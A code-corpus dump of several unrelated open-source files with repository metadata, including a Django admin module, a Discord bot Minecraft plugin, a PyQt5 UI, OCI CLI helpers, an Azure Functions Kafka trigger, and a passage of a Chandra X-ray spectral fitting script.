_test_setup_common_training_handlers(
dirname, device, rank=local_rank, local_rank=local_rank, distributed=True, lr_scheduler="ignite|LRScheduler"
)
_test_setup_common_training_handlers(
dirname, device, rank=local_rank, local_rank=local_rank, distributed=True, lr_scheduler="ignite"
)
test_add_early_stopping_by_val_score()
@pytest.mark.multinode_distributed
@pytest.mark.skipif("MULTINODE_DISTRIB" not in os.environ, reason="Skip if not multi-node distributed")
def test_multinode_distrib_cpu(dirname, distributed_context_multi_node_gloo):
device = "cpu"
rank = distributed_context_multi_node_gloo["rank"]
_test_setup_common_training_handlers(dirname, device, rank=rank)
test_add_early_stopping_by_val_score()
@pytest.mark.multinode_distributed
@pytest.mark.skipif("GPU_MULTINODE_DISTRIB" not in os.environ, reason="Skip if not multi-node distributed")
def test_multinode_distrib_gpu(dirname, distributed_context_multi_node_nccl):
local_rank = distributed_context_multi_node_nccl["local_rank"]
rank = distributed_context_multi_node_nccl["rank"]
device = "cuda:{}".format(local_rank)
_test_setup_common_training_handlers(dirname, device, rank=rank, local_rank=local_rank, distributed=True)
test_add_early_stopping_by_val_score()
|
[
"noreply@github.com"
] |
Bartolo1024.noreply@github.com
|
34f06475f2b005309de47f1a4dc9f063126748dc
|
d35fb547eb4d04be5ac06fd4e39bd11a6e7e2b39
|
/test_project/core/admin.py
|
8378e277899f8e598f8d2c40a63aee17b488b025
|
[
"MIT"
] |
permissive
|
youzerssif/djangoql
|
c2adea5414e57757ba630f4e0ee6cf5e6f08bcae
|
29b9379e181318cea60a31b679b8601bd5bd9404
|
refs/heads/master
| 2021-04-01T15:22:11.554094
| 2020-03-15T21:33:34
| 2020-03-15T21:33:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,721
|
py
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.models import User, Group
from django.db.models import Q, Count
from django.utils.timezone import now
from djangoql.admin import DjangoQLSearchMixin
from djangoql.schema import DjangoQLSchema, IntField
from .models import Book
admin.site.unregister(User)
class BookQLSchema(DjangoQLSchema):
suggest_options = {
Book: ['genre'],
}
@admin.register(Book)
class BookAdmin(DjangoQLSearchMixin, admin.ModelAdmin):
djangoql_schema = BookQLSchema
list_display = ('name', 'author', 'genre', 'written', 'is_published')
list_filter = ('is_published',)
filter_horizontal = ('similar_books',)
class UserAgeField(IntField):
"""
Search by given number of full years
"""
model = User
name = 'age'
def get_lookup_name(self):
"""
We'll be doing comparisons vs. this model field
"""
return 'date_joined'
def get_lookup(self, path, operator, value):
if operator == 'in':
result = None
for year in value:
condition = self.get_lookup(path, '=', year)
result = condition if result is None else result | condition
return result
elif operator == 'not in':
result = None
for year in value:
condition = self.get_lookup(path, '!=', year)
result = condition if result is None else result & condition
return result
value = self.get_lookup_value(value)
search_field = '__'.join(path + [self.get_lookup_name()])
year_start = self.years_ago(value + 1)
year_end = self.years_ago(value)
if operator == '=':
return (
Q(**{'%s__gt' % search_field: year_start}) &
Q(**{'%s__lte' % search_field: year_end})
)
elif operator == '!=':
return (
Q(**{'%s__lte' % search_field: year_start}) |
Q(**{'%s__gt' % search_field: year_end})
)
elif operator == '>':
return Q(**{'%s__lt' % search_field: year_start})
elif operator == '>=':
return Q(**{'%s__lt' % search_field: year_end})
elif operator == '<':
return Q(**{'%s__gt' % search_field: year_end})
elif operator == '<=':
return Q(**{'%s__gte' % search_field: year_start})
def years_ago(self, n):
timestamp = now()
try:
return timestamp.replace(year=timestamp.year - n)
except ValueError:
# February 29
return timestamp.replace(month=2, day=28, year=timestamp.year - n)
class UserQLSchema(DjangoQLSchema):
suggest_options = {
Book: ['genre'],
Group: ['name'],
}
def get_fields(self, model):
fields = super(UserQLSchema, self).get_fields(model)
if model == User:
fields += [UserAgeField(), IntField(name='groups_count')]
return fields
@admin.register(User)
class CustomUserAdmin(DjangoQLSearchMixin, UserAdmin):
djangoql_schema = UserQLSchema
djangoql_completion_enabled_by_default = False
search_fields = ('username', 'first_name', 'last_name')
list_display = ('username', 'first_name', 'last_name', 'is_staff', 'group')
def group(self, obj):
return ', '.join([g.name for g in obj.groups.all()])
group.short_description = 'Groups'
def get_queryset(self, request):
qs = super(CustomUserAdmin, self).get_queryset(request)
return qs.\
annotate(groups_count=Count('groups')).\
prefetch_related('groups')
|
[
"denis.stebunov@ivelum.com"
] |
denis.stebunov@ivelum.com
|
359c9319e5e7f599aece5c1091a11430ff15a4b8
|
45304b35e2793d7892a14f9416c76cfdd922db94
|
/bot/plugins/minecraft.py
|
b55d8348194a5a5d843c5a7a4ab59d19d473cff9
|
[] |
no_license
|
b1naryth1ef/b1nb0t
|
3f890d1ea5b863e6e708cb1599d0d81ff95b2bfb
|
10bab420ecf58b7aa918ee7060885503e2cad3e7
|
refs/heads/master
| 2021-01-20T00:20:58.104035
| 2019-06-24T15:26:50
| 2019-06-24T15:26:50
| 89,116,574
| 10
| 6
| null | 2017-07-14T00:08:25
| 2017-04-23T04:13:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,817
|
py
|
from mcipc.rcon import Client
from disco.bot import Plugin, Config
from disco.types.message import MessageEmbed
JOIN_COLOR = 0x77dd77
LEAVE_COLOR = 0xff6961
class MinecraftPluginConfig(Config):
ip = ''
port = 0
password = ''
channel_id = ''
@Plugin.with_config(MinecraftPluginConfig)
class MinecraftPlugin(Plugin):
def load(self, data):
super().load(data)
self._online = None
@Plugin.schedule(20, init=True)
def on_schedule(self):
self.state.ready.wait()
players = self.get_players()
if not players:
return
channel = self.state.channels.get(self.config.channel_id)
if not channel:
print('failed to find channel')
return
names = set(players.names)
if self._online is not None and names != self._online:
connected = names - self._online
for conn in connected:
embed = MessageEmbed()
embed.color = JOIN_COLOR
embed.title = '{} joined the server'.format(conn)
channel.send_message(embed=embed)
disconnected = self._online - names
for conn in disconnected:
embed = MessageEmbed()
embed.color = LEAVE_COLOR
embed.title = '{} left the server'.format(conn)
channel.send_message(embed=embed)
if self._online is None:
print('Initial Online: {}'.format(names))
self._online = names
def get_players(self):
try:
with Client(self.config.ip, self.config.port) as client:
client.login(self.config.password)
return client.players
except Exception:
self.log.exception('Failed to query minecraft RCON: ')
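# --- Illustrative config sketch (not from this repository). ---
# MinecraftPluginConfig above expects an RCON host/port/password plus the
# Discord channel id to post join/leave embeds to; the values below are
# hypothetical placeholders, and the exact config layout depends on how the
# disco bot is configured.
#
#   minecraft:
#     ip: "127.0.0.1"
#     port: 25575               # default Minecraft RCON port
#     password: "rcon-password"
#     channel_id: "123456789012345678"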
|
[
"b1naryth1ef@gmail.com"
] |
b1naryth1ef@gmail.com
|
fc8f274d6751296228bfbc0464614b4792647541
|
a892e0b3036e940e4a6605567e8e1b00ebb22f59
|
/FALLOW/gui/uis/input_maps/MapInputUI.py
|
efefb6f639d3964c16046f996e460ed8044dae8d
|
[] |
no_license
|
uttu90/NewFALLOW
|
9e03ddee089b288bd31497c5ff584635889eef69
|
ef7a32edae96bbc268c6db91ad548be980348198
|
refs/heads/master
| 2021-01-11T22:02:04.805243
| 2018-08-11T08:38:01
| 2018-08-11T08:38:01
| 78,899,955
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,972
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MapInputUI.ui'
#
# Created by: PyQt5 UI code generator 5.6
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1551, 982)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout_2 = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout_2.setObjectName("gridLayout_2")
self.MapInputWidget = QtWidgets.QWidget(self.centralwidget)
self.MapInputWidget.setEnabled(True)
self.MapInputWidget.setMinimumSize(QtCore.QSize(500, 500))
self.MapInputWidget.setMouseTracking(True)
self.MapInputWidget.setFocusPolicy(QtCore.Qt.ClickFocus)
self.MapInputWidget.setAcceptDrops(True)
self.MapInputWidget.setInputMethodHints(QtCore.Qt.ImhNone)
self.MapInputWidget.setObjectName("MapInputWidget")
self.gridLayout_2.addWidget(self.MapInputWidget, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setObjectName("toolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.dockWidget = QtWidgets.QDockWidget(MainWindow)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.dockWidget.sizePolicy().hasHeightForWidth())
self.dockWidget.setSizePolicy(sizePolicy)
self.dockWidget.setMinimumSize(QtCore.QSize(386, 260))
self.dockWidget.setFeatures(QtWidgets.QDockWidget.NoDockWidgetFeatures)
self.dockWidget.setObjectName("dockWidget")
self.dockWidgetContents = QtWidgets.QWidget()
self.dockWidgetContents.setObjectName("dockWidgetContents")
self.gridLayout = QtWidgets.QGridLayout(self.dockWidgetContents)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label = QtWidgets.QLabel(self.dockWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.inputPixelSize = QtWidgets.QLineEdit(self.dockWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.inputPixelSize.sizePolicy().hasHeightForWidth())
self.inputPixelSize.setSizePolicy(sizePolicy)
self.inputPixelSize.setMinimumSize(QtCore.QSize(30, 20))
self.inputPixelSize.setMaximumSize(QtCore.QSize(30, 20))
self.inputPixelSize.setObjectName("inputPixelSize")
self.horizontalLayout.addWidget(self.inputPixelSize)
spacerItem = QtWidgets.QSpacerItem(100, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
self.mapTree = QtWidgets.QTreeView(self.dockWidgetContents)
self.mapTree.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mapTree.sizePolicy().hasHeightForWidth())
self.mapTree.setSizePolicy(sizePolicy)
self.mapTree.setMinimumSize(QtCore.QSize(350, 0))
self.mapTree.setMouseTracking(True)
self.mapTree.setFocusPolicy(QtCore.Qt.StrongFocus)
self.mapTree.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu)
self.mapTree.setAcceptDrops(True)
self.mapTree.setLayoutDirection(QtCore.Qt.LeftToRight)
self.mapTree.setEditTriggers(QtWidgets.QAbstractItemView.DoubleClicked|QtWidgets.QAbstractItemView.EditKeyPressed)
self.mapTree.setProperty("showDropIndicator", False)
self.mapTree.setDragEnabled(False)
self.mapTree.setDragDropOverwriteMode(False)
self.mapTree.setDragDropMode(QtWidgets.QAbstractItemView.NoDragDrop)
self.mapTree.setTextElideMode(QtCore.Qt.ElideRight)
self.mapTree.setObjectName("mapTree")
self.gridLayout.addWidget(self.mapTree, 1, 0, 1, 1)
self.dockWidget.setWidget(self.dockWidgetContents)
MainWindow.addDockWidget(QtCore.Qt.DockWidgetArea(1), self.dockWidget)
self.openMap = QtWidgets.QAction(MainWindow)
self.openMap.setObjectName("openMap")
self.save = QtWidgets.QAction(MainWindow)
self.save.setObjectName("save")
self.action_Compare = QtWidgets.QAction(MainWindow)
self.action_Compare.setObjectName("action_Compare")
self.toolBar.addAction(self.openMap)
self.toolBar.addAction(self.save)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Input Maps"))
self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar"))
self.dockWidget.setWindowTitle(_translate("MainWindow", "Map Input"))
self.label.setText(_translate("MainWindow", "Pixel size (ha)"))
self.inputPixelSize.setText(_translate("MainWindow", "30"))
self.openMap.setText(_translate("MainWindow", "&Open"))
self.openMap.setToolTip(_translate("MainWindow", "Choose a map file"))
self.openMap.setShortcut(_translate("MainWindow", "Ctrl+O"))
self.save.setText(_translate("MainWindow", "&Save"))
self.save.setToolTip(_translate("MainWindow", "Save project"))
self.save.setShortcut(_translate("MainWindow", "Ctrl+S"))
self.action_Compare.setText(_translate("MainWindow", "&Compare"))
self.action_Compare.setToolTip(_translate("MainWindow", "Choose files to compare with"))
self.action_Compare.setShortcut(_translate("MainWindow", "Ctrl+C"))
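# --- Illustrative usage sketch (not part of the generated file). ---
# Qt Designer output like this is normally driven by creating a QMainWindow
# and handing it to setupUi(); the names below are placeholders.
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    window = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(window)
    window.show()
    sys.exit(app.exec_())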
|
[
"hondasuytu.ht@gmail.com"
] |
hondasuytu.ht@gmail.com
|
6ecccae2ad918d71cfffe40ee69cf978ced6654a
|
fcf7f2cf2eae3dba6d6f931918da32a589b6bc95
|
/src/ipoci.py
|
a51964a68b8ac14158e9a41114b88748fe465a4f
|
[
"MIT"
] |
permissive
|
HenriqueLuizz/inspetor-lestrade
|
4dcaed5bd36b1a3240c503f2a2502861aa70220c
|
eea85c29f1e0f5da4414c1d0cfe222b87015a398
|
refs/heads/master
| 2021-01-01T09:43:22.526286
| 2020-05-23T07:32:17
| 2020-05-23T07:32:17
| 239,224,156
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,421
|
py
|
import json
import subprocess
import common
def resultOCI(d):
if d['status']:
o = json.loads(d['result'])
if 'data' in o:
name = o['data']['display-name']
lifecycle = o['data']['lifecycle-state']
print(f'{name} - {lifecycle}')
return True
else:
        print('Failed to connect to OCI \n' + d['result'])
return False
def check_oci(iids:list):
for iid in iids:
command=f'oci compute instance get --instance-id {iid}'
data = common.run(command)
if data['status']:
resultOCI(data)
return True
else:
            print('Failed to connect to OCI \n' + data['result'])
return False
def instancie_oci(iids:list, action='get'):
print(f'OCI operation {action} running... ')
if action.lower() == 'start':
for iid in iids:
data = common.run(f'oci compute instance action --instance-id {iid} --action START')
resultOCI(data)
elif action.lower() == 'stop':
for iid in iids:
data = common.run(f'oci compute instance action --instance-id {iid} --action STOP')
resultOCI(data)
else:
for iid in iids:
data = common.run(f'oci compute instance get --instance-id {iid}')
resultOCI(data)
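# --- Illustrative usage sketch; the OCID below is a hypothetical placeholder. ---
# Both helpers shell out to the OCI CLI through common.run(), so this only does
# anything useful with a configured `oci` client on the PATH.
if __name__ == '__main__':
    sample_ids = ['ocid1.instance.oc1..example']  # hypothetical instance OCID
    check_oci(sample_ids)               # prints display-name / lifecycle-state
    instancie_oci(sample_ids, 'get')    # or 'start' / 'stop'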
|
[
"hl.silva89@gmail.com"
] |
hl.silva89@gmail.com
|
6322e51e9bb420079d6de9499a7eae3794cabbad
|
cadd471f2e36725008617a7451166c94723dcd31
|
/Basic/d881.py
|
eb5acd58236a08fa98ad2d380c7badad2f9aceb5
|
[] |
no_license
|
vectominist/ZJ-Solutions-in-Python
|
21b77b543a4c6d48d1d5b817b5421ec30e15192c
|
8b5bbf2a7a0a681c7433b16aa7c6161cae93c644
|
refs/heads/master
| 2020-04-14T02:14:21.935167
| 2019-11-06T06:39:08
| 2019-11-06T06:39:08
| 163,578,899
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
import sys
for s in sys.stdin:
num = s.split()
d = int(num[0])
a = [1]
b = [1]
ans = 1
for i in range(1, 50):
a.append(a[-1] + b[-1])
b.append(b[-1] + d)
ans += a[-1]
print(ans)
|
[
"noreply@github.com"
] |
vectominist.noreply@github.com
|
b7a04e8a27c7603e98a032463d2e5828169e75c8
|
8e298335fcd9644b1754daf3682b446bf9351a07
|
/minhaApi/manage.py
|
521739097ff924d16cbd504eebe488eeaaa26e8a
|
[] |
no_license
|
Victormbg/APIs-com-DJango-REST-FRAMEWORK
|
56d1b71efaa8c21eecdffaf8c287a00951f99004
|
cdf7745160edef5c86816fec4349c423a2223e2f
|
refs/heads/master
| 2020-09-11T17:39:44.340696
| 2019-11-16T18:45:20
| 2019-11-16T18:45:20
| 222,140,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 806
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "minhaApi.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
[
"victormbg2000@gmail.com"
] |
victormbg2000@gmail.com
|
f40c13d6b6a429e47aaac723a0b9ee9a715abc36
|
40bee13ce471aa704de68ede1ee8579106396ba3
|
/crudstuff/bindmodels.py
|
a92f1576873ed7295be85245a8483d1b9872485e
|
[] |
no_license
|
mikelopez/django-app-skel-crud
|
9029648982ef8881c5859faac60ada4424cac576
|
a01b0eeaffbe12d314eb3f9ab1cd692d6defce34
|
refs/heads/master
| 2020-12-24T16:58:47.140247
| 2013-03-04T21:28:03
| 2013-03-04T21:28:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,383
|
py
|
import importlib
class admin_models:
"""
class wrapper for admin_models data dict
if using as a pluggable app via setup tools, make
sure to override models and forms with
data from your projects settings. if you copied the
application folder local to your project then you can just
edit models and forms here and keep exclude the settings options
"""
model_tables = {
'website': 'Website',
'websitepage': 'WebsitePage',
}
models = {
'website': 'mainweb',
'websitepage': 'mainweb'
}
forms = {
'website': 'WebsiteForm',
'websitepage': 'WebsitePageForm'
}
def __init__(self, settings=None):
"""
Check settings and override self.models and self.forms
data dictionary if variables present in settings
"""
if settings:
try:
if getattr(settings, 'CRUDSTUFF_MODELS'):
self.models = getattr(settings, 'CRUDSTUFF_MODELS')
except AttributeError:
pass
try:
if getattr(settings, 'CRUDSTUFF_FORMS'):
self.forms = getattr(settings, 'CRUDSTUFF_FORMS')
except AttributeError:
pass
try:
                if getattr(settings, 'CRUDSTUFF_MODEL_TABLES'):
self.model_tables = getattr(settings, 'CRUDSTUFF_MODEL_TABLES')
except AttributeError:
pass
def get_app(self, k):
"""
get the app name based on a model
"""
return self.models.get(k)
def get_app_by_model(self, k):
"""
get the app name by the model name so that
we can know which app to look for forms in
"""
if not k in self.models.keys():
return None
return self.models.get(k)
def get_form_by_model(self, k):
"""
get the form class instance by the model name and app name
"""
app = self.get_app_by_model(k)
if not app:
raise Exception('App %s is not found for model %s ' % (app, k))
forms_module = importlib.import_module('%s.forms'%(app))
form = getattr(forms_module, self.forms.get(k))
if not form:
            raise Exception('Form %s not found for %s ' % (self.forms.get(k), app))
return form
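# --- Illustrative only: the settings overrides described in the class
# docstring might look like this (app/model/form names are hypothetical;
# the CRUDSTUFF_* keys are the ones read in __init__ above).
#
#   # settings.py
#   CRUDSTUFF_MODELS = {'book': 'library'}
#   CRUDSTUFF_MODEL_TABLES = {'book': 'Book'}
#   CRUDSTUFF_FORMS = {'book': 'BookForm'}
#
#   # elsewhere in the project
#   from django.conf import settings
#   from crudstuff.bindmodels import admin_models
#   form_cls = admin_models(settings).get_form_by_model('book')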
|
[
"dev@scidentify.info"
] |
dev@scidentify.info
|
16e61330ddfbe4a840f6d76cc9e7ef9e81e18c5b
|
31b4bfcf79600d968f061ad9e25e9224aaa5fb1e
|
/test/Microsoft.Azure.WebJobs.Extensions.Kafka.LangEndToEndTests/FunctionApps/python/Confluent/MultiHttpTriggerKafkaOutput/__init__.py
|
cb8b516d26ba3047bb2a311083325f789aa53727
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
Azure/azure-functions-kafka-extension
|
cd640ac94cd995d93942eca76851e7399e9eaaf8
|
59f93fb60603a7428f6975b7f7836ece78e8cd19
|
refs/heads/dev
| 2023-08-18T13:19:50.603255
| 2023-07-28T09:17:10
| 2023-07-28T09:17:10
| 174,426,959
| 102
| 73
|
MIT
| 2023-08-26T01:07:32
| 2019-03-07T22:03:17
|
C#
|
UTF-8
|
Python
| false
| false
| 837
|
py
|
import logging
import typing
from azure.functions import KafkaEvent, Out, HttpRequest, HttpResponse
import json
def main(req: HttpRequest, out: Out[str] ) -> HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
message = req.params.get('message')
message1 = req.params.get('message1')
message2 = req.params.get('message2')
if message and message1 and message2:
messagesarr = [message, message1, message2]
out.set(json.dumps(messagesarr))
return HttpResponse(f"Message received: {message} {message1} {message2}. The message transfered to the kafka broker.")
else:
return HttpResponse(
"This HTTP triggered function executed successfully. Pass a name in the query string for a personalized response.",
status_code=200
)
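# --- Illustrative only (hypothetical request; route follows the default
# /api/<function-name> convention). A call such as
#   GET /api/MultiHttpTriggerKafkaOutput?message=a&message1=b&message2=c
# leads to out.set(json.dumps(["a", "b", "c"])), handing the JSON array to
# the Kafka output binding declared in this function's function.json.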
|
[
"kkariya@microsoft.com"
] |
kkariya@microsoft.com
|
5e8a1d01a2d01078822c6908247a5b831c92e330
|
81f91106bf9a748a3eb257127e7fc342aecd4b9f
|
/fit_spectra.py
|
d6f58870b1fda1985fdcc83ac03247d93a4be6d8
|
[] |
no_license
|
martijndevries/Xmaps
|
a3dae7dbd1656874750dc0db5feb1cc859abf6b0
|
f56e5e3a5f8355b541a09f842a56f056dd5e01bc
|
refs/heads/master
| 2021-01-17T23:09:54.810778
| 2013-11-27T15:21:51
| 2013-11-27T15:21:51
| 20,330,213
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59,287
|
py
|
"""
Fits a model to Chandra spectra.
This module can use the output of extract_spectra.py to fit
a model to the spectra. If run as a script, multiple spectra
may be specified by giving a text file that lists the
spectra as an argument with '@' prepended.
Version 0.6: 3/5/2011 - Updated for Ciao 4.3
Version 0.7: 1/11/2013 - Updated for Ciao 4.5
"""
import os
import sys
import subprocess
import numpy
import multiprocessing
import threading
# Check that CIAO was initialized
if os.environ.get("CALDB") == None:
    sys.exit('Please initialize CIAO before running this script.')
from sherpa.astro.ui import *
from pychips import *
import gc
def call_sherpa_1T(spectra, redshift, nH_Gal, kT_guess, Ab_guess, root, lo_energy='0.5', hi_energy='7.0', plasma_model='mekal', min_counts=100, binning=None, reg_num_to_start=0, fix_nH_Gal=True, fix_abund=False, find_errors=False, make_plots=False, min_cnt_rate_ratio=0.3, clobber=False):
"""
Calls Sherpa to fit a single-temperature model to one or more spectra.
Inputs: spectra - list of input PI files. Can be a list of
lists if there is more than one observation:
e.g., [spectra_obs1, spectra_obs2], where
                     spectra_obs1 = ['reg1.pi', 'reg2.pi', ...]
redshift - redshift of source
nH_Gal - Galactic N_H (10^22 cm^-2)
kT_guess - initial guess for temperature (keV)
Ab_guess - initial guess for abundance
root - root of output file with fit results
lo_energy - lower bound of fitted energy range (keV)
hi_energy - upper bound of fitted energy range (keV)
plasma_model - specifies the plasma model (mekal or apec)
min_counts - minimum number of total counts required for
fitting
binning - number of counts per bin for fitting
reg_num_to_start - number to start from when numbering the
fit results by region
fix_nH_Gal - if True, freezes nH_Gal
fix_abund - if True, freezes abundance
find_errors - if True, calculates errors
make_plots - if True, make a plot of fit for each region
min_cnt_rate_ratio - min ratio (relative to max cnt rate
in region) below which to discard
observations
clobber - if True, overwrite existing file
    Outputs: The fit results are saved to the file:
root+'_wabs_'+plasma_model+'.dat'
"""
if isinstance(spectra, str): spectra = [spectra]
if isinstance(spectra[0], str):
nreg = 1 # number of regions
else:
nreg = len(spectra[0]) # number of regions
nobs = len(spectra) # number of observations
fit_results_file = root + '_wabs_' + plasma_model + '.dat'
ccolor = ["blue", "gold", "cyan", "forest", "darkred", "red", "gray", "green", "magenta", "orange", "black", "yellow", "turquoise", "firebrick", "brown", "azure", "honeydew", "lime", "mistyrose", "navy"]
if type(redshift) == str: redshift = float(redshift)
if type(nH_Gal) == str: nH_Gal = float(nH_Gal)
if type(kT_guess) == str: kT_guess = float(kT_guess)
if type(Ab_guess) == str: Ab_guess = float(Ab_guess)
if type(lo_energy) == str: lo_energy = float(lo_energy)
if type(hi_energy) == str: hi_energy = float(hi_energy)
if os.path.isfile(fit_results_file) == False or clobber == True:
results_file = open(fit_results_file, "w")
results_file.write('# Fit results for wabs*'+plasma_model+' (zeros indicate that no fitting was performed)\n')
results_file.write('# Reg_no. kT kT_loerr kT_hierr Z Z_loerr Z_hierr norm norm_loerr norm_hierr nH_Gal nH_loerr nH_hierr red_chisq total_counts num_bins\n')
for i in range(nreg):
print('\n')
clean() # reset everything
gc.collect() # collect garbage every step to avoid memory problems when fitting a large number (>10) of observations simultaneously
nobs_current_reg = 0 # number of valid spectra for this region
if nobs > 1:
cnts = numpy.zeros(nobs) # array to store counts
max_rate = numpy.zeros(nobs) # max count rate [counts/s/keV]
src_id = 0 # index of source id
good_src_ids = numpy.zeros(nobs, dtype=int) - 1
for j in range(nobs):
pi_file = spectra[j][i]
pi_root = os.path.splitext(pi_file)[0]
if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
load_pha(src_id, pi_file)
if binning != None:
print('Grouping to ' + str(binning) + ' counts...')
group_counts(src_id, binning)
ignore_id(src_id, 0.0, lo_energy)
ignore_id(src_id, hi_energy, None)
cnts[j] = calc_data_sum(lo_energy, hi_energy, src_id) # get counts in filtered dataset
print('Counts for obs '+str(j+1)+': '+str(int(cnts[j])))
cnt_rate = get_rate(src_id, filter=True)
if len(cnt_rate) == 0: # when few counts (<50), get_rate can return zero-length array
max_rate[j] = 0.0
else:
max_rate[j] = numpy.max(cnt_rate)
subtract(src_id) # subtract the background
if src_id == 0:
if plasma_model == 'mekal':
set_source(src_id, xswabs.abs1 * xsmekal.plsm1)
if plasma_model == 'apec':
set_source(src_id, xswabs.abs1 * xsapec.plsm1)
else:
set_source(src_id, abs1 * plsm1)
good_src_ids[j] = src_id
src_id += 1
# Filter out ignored observations
good_src_ids_indx = numpy.where(good_src_ids >= 0)
good_src_ids = good_src_ids[good_src_ids_indx]
max_rate = max_rate[good_src_ids_indx]
cnts = cnts[good_src_ids_indx]
# If min_cnt_rate_ratio is specified, check whether the count rate
# of any observation falls below the limit.
if min_cnt_rate_ratio != None:
max_rate_overall = numpy.max(max_rate)
max_rate_ratios = max_rate / max_rate_overall
lowcr_src_ids_indx = numpy.where(max_rate_ratios < min_cnt_rate_ratio)
highcr_src_ids_indx = numpy.where(max_rate_ratios >= min_cnt_rate_ratio)
if len(lowcr_src_ids_indx) > 0:
lowcr_src_ids = good_src_ids[lowcr_src_ids_indx]
good_src_ids = good_src_ids[highcr_src_ids_indx]
cnts = cnts[highcr_src_ids_indx]
for b in range(len(lowcr_src_ids)):
print('Removing observation '+str(lowcr_src_ids[b]+1)+' (dataset '+str(lowcr_src_ids[b])+') for low count rate.')
delete_data(lowcr_src_ids[b])
nobs_current_reg -= 1
            if nobs == 1:
                cnts = numpy.zeros(1)  # array to store counts
                pi_file = spectra[i]
pi_root = os.path.splitext(pi_file)[0]
if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
load_pha(pi_file)
if binning != None:
                        group_counts(binning)  # group the default (only) dataset
if plasma_model == 'mekal':
set_source(xswabs.abs1 * xsmekal.plsm1)
if plasma_model == 'apec':
set_source(xswabs.abs1 * xsapec.plsm1)
ignore(0.0, lo_energy)
ignore(hi_energy, None)
cnts[0] = calc_data_sum(lo_energy, hi_energy) # get counts in filtered dataset
subtract()
# Check whether total counts >= min_counts.
# If so, fit; if not, skip the fit
